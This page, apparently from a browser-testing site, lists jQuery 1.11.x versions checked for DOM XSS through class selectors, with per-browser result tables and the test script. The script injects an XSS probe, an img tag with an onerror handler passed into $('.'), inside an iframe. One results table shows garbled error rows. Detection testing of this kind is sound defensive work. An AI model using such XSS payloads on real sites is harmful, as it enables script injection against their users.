jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')

List of all jQuery versions vulnerable to class selector XSS. These jQuery libraries cause DOM XSS when a user controlled value is passed as a the class selected [$('.'+ className)]

By
hbkninad 0 Seen 1528 times
Tags
jquery xss
Run this test now.

Results


Tested on
Chrome - 73 - Windows 10
jQuery VersionIs it Vulnerable?
jQuery 1.11.3Safe
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe

Tested on
Firefox - 61 - Windows 10
jQuery VersionIs it Vulnerable?
jQuery 1.11.0Safe
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.3Safe

Tested on
Googlebot - 2.1 - undefined
jQuery VersionIs it Vulnerable?
jQuery 1.11.3Safe
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe

Tested on
IE - 11 - Windows 7
jQuery VersionIs it Vulnerable?
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe
jQuery 1.11.3Safe

Tested on
Iceweasel - 38.2.1 - Linux
jQuery VersionIs it Vulnerable?
jQuery 1.11.3Safe
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe

Tested on
Chrome Mobile - 83 - Android
jQuery VersionIs it Vulnerable?
ancestorOriginsSome Error Occured
hostSome Error Occured
hrefSome Error Occured
originSome Error Occured
protocolSome Error Occured
hostnameSome Error Occured
portSome Error Occured
hashSome Error Occured
searchSome Error Occured
pathnameSome Error Occured
assignSome Error Occured
toStringSome Error Occured
reloadSome Error Occured
replaceSome Error Occured
valueOfSome Error Occured

Tested on
Opera - 47 - Windows 10
jQuery VersionIs it Vulnerable?
jQuery 1.11.2Safe
jQuery 1.11.1Safe
jQuery 1.11.0Safe
jQuery 1.11.3Safe

User Script (ENUM_FUNCTION)

					
// Custom Functions
var jQuery_version = '';
function vulnerable(){
    addError('jQuery '+ jQuery_version, '<b>Vulnerable</b>');
}

function safe(){
    addSuccess('jQuery '+ jQuery_version, 'Safe');
}
    
function removeIframe(){
    var x = document.getElementById('jQueryFrameID');
    x.parentNode.removeChild(x);
}

// Test Function
function test(data){
	// We need to separate properties and access one by one.
try{
    jQuery_version = data;
    var jQueryFrame = document.createElement('iframe');
    jQueryFrame.id = 'jQueryFrameID';
    jQueryFrame.onload = function(){
            var jQueryScript = jQueryFrame.contentWindow.document.createElement('script');
            jQueryScript.type = 'text/javascript';
            jQueryScript.src = 'https://ajax.googleapis.com/ajax/libs/jquery/'+ data.toString() +'/jquery.js';
            jQueryFrame.contentWindow.document.body.appendChild(jQueryScript);
            jQueryScript.onload = function(){
                var exploitScript = "try{function bad(){parent.vulnerable(); parent.removeIframe();} $('. <img src=x onerror=bad();>');} catch(err){parent.safe();parent.removeIframe();}";
                var exploit = jQueryFrame.contentWindow.document.createElement('script');
                exploit.type = 'text/javascript';
                exploit.innerHTML = exploitScript;
                jQueryFrame.contentWindow.document.body.appendChild(exploit);
                
            };
            jQueryScript.onerror = function(){
                addResult(data ,  'Some Error Occured');
            }
    };
    document.body.appendChild(jQueryFrame);

}

catch(err){
	addInfo(data ,  'Some Error Occured');
}

}
					
				
					
				

Enum Data (ENUM_FUNCTION)

					
// Taken from jQuery Versions Under, https://developers.google.com/speed/libraries/devguide#jquery
var data = [ '1.11.3', '1.11.2', '1.11.1', '1.11.0' ];